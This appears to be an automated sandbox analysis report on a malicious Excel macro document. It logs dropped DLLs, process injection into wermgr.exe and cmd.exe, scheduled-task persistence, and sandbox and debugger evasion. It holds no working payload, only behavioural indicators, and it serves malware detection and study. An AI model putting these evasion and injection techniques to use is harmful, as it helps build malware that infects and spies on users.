Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00067C30 NtQueryInformationProcess,	5_2_00067C30
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0007C8E0 NtQuerySystemInformation,CLSIDFromString,DuplicateHandle,HeapFree,	5_2_0007C8E0

Creates files inside the system directory

Source: C:\Windows\System32\wermgr.exe

File created: C:\Windows\system32\cn\

Jump to behavior

Detected potential crypto function

Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00062810	5_2_00062810
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00084030	5_2_00084030
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00076890	5_2_00076890
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0007C8E0	5_2_0007C8E0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00065D60	5_2_00065D60
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006D180	5_2_0006D180
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006F600	5_2_0006F600
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006CE60	5_2_0006CE60
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_000756D0	5_2_000756D0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00068300	5_2_00068300
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006BB10	5_2_0006BB10
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006EF30	5_2_0006EF30
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00063460	5_2_00063460
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00065460	5_2_00065460
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0007E460	5_2_0007E460
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006A0A0	5_2_0006A0A0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_000684D0	5_2_000684D0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006ACD0	5_2_0006ACD0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_000838F0	5_2_000838F0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00063D20	5_2_00063D20
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00062530	5_2_00062530
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_000611B0	5_2_000611B0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006D5D0	5_2_0006D5D0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00077A10	5_2_00077A10
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006AA20	5_2_0006AA20
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00082E50	5_2_00082E50
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00071E60	5_2_00071E60
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006CA80	5_2_0006CA80
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006C2B0	5_2_0006C2B0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_000796C0	5_2_000796C0
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00080720	5_2_00080720
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00066F40	5_2_00066F40
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_000823F0	5_2_000823F0
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180011A74	9_2_0000000180011A74
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180016C20	9_2_0000000180016C20
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018000FD48	9_2_000000018000FD48
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018001AFC0	9_2_000000018001AFC0
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018000BFE4	9_2_000000018000BFE4
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800110B4	9_2_00000001800110B4
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800130E8	9_2_00000001800130E8
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800020E8	9_2_00000001800020E8
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800011DC	9_2_00000001800011DC
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018001822C	9_2_000000018001822C
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018001D2C0	9_2_000000018001D2C0
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180020300	9_2_0000000180020300
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180004320	9_2_0000000180004320
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180008444	9_2_0000000180008444
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018001C4C8	9_2_000000018001C4C8
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180001574	9_2_0000000180001574
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180003594	9_2_0000000180003594
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800076B8	9_2_00000001800076B8
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800026C0	9_2_00000001800026C0
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018003B6C4	9_2_000000018003B6C4
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180023780	9_2_0000000180023780
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180036828	9_2_0000000180036828
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180019860	9_2_0000000180019860
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180025868	9_2_0000000180025868
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800188B0	9_2_00000001800188B0
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800018CC	9_2_00000001800018CC
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018000E8EC	9_2_000000018000E8EC
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_00000001800158F8	9_2_00000001800158F8
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018003396C	9_2_000000018003396C
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180002A24	9_2_0000000180002A24
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018008FC84	9_2_000000018008FC84
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180014D24	9_2_0000000180014D24
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180002D88	9_2_0000000180002D88
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180007D89	9_2_0000000180007D89
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180083E30	9_2_0000000180083E30
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018008BE3C	9_2_000000018008BE3C
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180024EC0	9_2_0000000180024EC0
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_0000000180003F38	9_2_0000000180003F38
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018000BFE0	9_2_000000018000BFE0

Document contains embedded VBA macros

Source: SecuriteInfo.com.Heur.31681.xls

OLE indicator, VBA macros: true

Yara signature match

Source: SecuriteInfo.com.Heur.31681.xls, type: SAMPLE

Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research

Source: rundll32.exe, 00000003.00000002.2105813487.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2104688226.0000000000800000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2368153807.0000000000780000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLS@14/16@5/5

Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_0006E420 LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,		5_2_0006E420
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018000B848 LookupPrivilegeValueA,AdjustTokenPrivileges,		9_2_000000018000B848

Source: C:\Windows\System32\cmd.exe

Code function: 9_2_000000018000BB84 CreateToolhelp32Snapshot,Process32First,Process32Next,StrStrIA,

9_2_000000018000BB84

Source: C:\Windows\System32\wermgr.exe

Code function: 5_2_0006BA20 CoCreateInstance,

5_2_0006BA20

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT

Jump to behavior

Source: C:\Windows\System32\wermgr.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\{79ED1AB7-4F83-DE32-0BD1-4533166B87A7}

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD6CE.tmp

Jump to behavior

Source: SecuriteInfo.com.Heur.31681.xls

OLE indicator, Workbook stream: true

Source: C:\Windows\System32\wermgr.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\System32\wermgr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW

Source: SecuriteInfo.com.Heur.31681.xls

ReversingLabs: Detection: 12%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {A9986821-F5E8-4178-8C7A-712EEA14850B} S-1-5-18:NT AUTHORITY\System:Service:
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\iDownloadManager1882563550\kufndskfndszi.dwn',StartW
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fndskfnds.dfm,StartW	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\iDownloadManager1882563550\kufndskfndszi.dwn',StartW	Jump to behavior

Source: C:\Windows\System32\taskeng.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E821032 StartW,VirtualAlloc,VirtualFree,LoadLibraryA,GetProcAddress,MessageBoxA,SendMessageA,SetTimer,KillTimer,

4_2_6E821032

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00290B40 push dword ptr [edx+14h]; ret	4_2_00290C4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00290205 push edx; iretd	4_2_00290206
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00290AD8 push dword ptr [edx+14h]; ret	4_2_00290C4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00290B10 push dword ptr [edx+14h]; ret	4_2_00290C4D
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00086E83 push es; ret	5_2_00086F30
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018004047A push ebp; ret	9_2_000000018004047B
Source: C:\Windows\System32\cmd.exe	Code function: 9_2_000000018003259D push edi; ret	9_2_000000018003259F

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\fndskfnds.dfm			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\fndskfnds.dfm

Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\fndskfnds.dfm

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\fndskfnds.dfm

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Source: C:\Windows\System32\wermgr.exe

Function Chain: threadCreated,threadDelayed,threadDelayed,userTimerSet,threadDelayed,threadDelayed,fileVolumeQueried,adjustToken,handleClosed,systemQueried,systemQueried,threadDelayed,mutantCreated,threadInformationSet,threadInformationSet,languageOrLocalQueried,threadDelayed,threadDelayed,threadDelayed,threadInformationSet,threadInformationSet,systemQueried,systemQueried,fileOpened,directoryQueried

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\System32\wermgr.exe

RDTSC instruction interceptor: First address: 0000000000067D50 second address: 0000000000067D50 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 ret 0x0000000a dec esp 0x0000000b mov edi, eax 0x0000000d call dword ptr [0002396Eh] 0x00000013 jmp 00007FE928B24D30h 0x00000015 jmp dword ptr [0007C47Ah] 0x0000001b mov ecx, dword ptr [7FFE0004h] 0x00000022 dec eax 0x00000023 mov eax, dword ptr [7FFE0320h] 0x0000002a dec eax 0x0000002b imul eax, ecx 0x0000002e dec eax 0x0000002f shr eax, 18h 0x00000032 ret 0x00000033 inc esp 0x00000034 mov esi, eax 0x00000036 dec ecx 0x00000037 mov eax, edi 0x00000039 dec eax 0x0000003a not eax 0x0000003c dec eax 0x0000003d mov ebx, 6CEE0E00h 0x00000042 xor edx, edx 0x00000044 inc ecx 0x00000045 xchg byte ptr [eax+0Bh], cl 0x00000048 fmul dword ptr [ebx-17280808h] 0x0000004e aaa 0x0000004f arpl word ptr [eax], ax 0x00000051 add byte ptr [edi], cl

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\System32\wermgr.exe

Code function: 5_2_00067D50 rdtsc

5_2_00067D50

Contains functionality to query network adapater information

Source: C:\Windows\System32\wermgr.exe

Code function: GetAdaptersInfo,

5_2_00073460

Found dropped PE file which has not been started or loaded

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmouser[1].dll

Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\taskeng.exe TID: 2948	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\cmd.exe TID: 2228	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\cmd.exe TID: 2960	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00062E60 FindFirstFileW,FindNextFileW,		5_2_00062E60
Source: C:\Windows\System32\wermgr.exe	Code function: 5_2_00063B00 FindFirstFileW,		5_2_00063B00

Source: C:\Windows\System32\cmd.exe

Code function: 9_2_00000001800225AC GetSystemInfo,

9_2_00000001800225AC

Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 43489			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Thread delayed: delay time: 30000			Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\System32\wermgr.exe

Code function: 5_2_00067D50 rdtsc

5_2_00067D50

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\System32\wermgr.exe

Code function: 5_2_00072AD0 LdrLoadDll,

5_2_00072AD0

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E821032 StartW,VirtualAlloc,VirtualFree,LoadLibraryA,GetProcAddress,MessageBoxA,SendMessageA,SetTimer,KillTimer,

4_2_6E821032

Enables debug privileges

Source: C:\Windows\System32\cmd.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\System32\wermgr.exe

Code function: 5_2_0006F600 SleepEx,SetTimer,RtlAddVectoredExceptionHandler,

5_2_0006F600

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Source: C:\Windows\SysWOW64\rundll32.exe

Memory allocated: C:\Windows\System32\wermgr.exe base: 60000 protect: page execute and read and write

Jump to behavior

Hijacks the control flow in another process

Source: C:\Windows\System32\wermgr.exe	Memory written: PID: 3068 base: 1800B5000 value: FF			Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: PID: 1688 base: 180079000 value: FF			Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\wermgr.exe base: 60000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\wermgr.exe base: FFF593F8	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 60000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 49D790B4	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 140000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 140000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 70000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Memory written: C:\Windows\System32\cmd.exe base: 130000	Jump to behavior
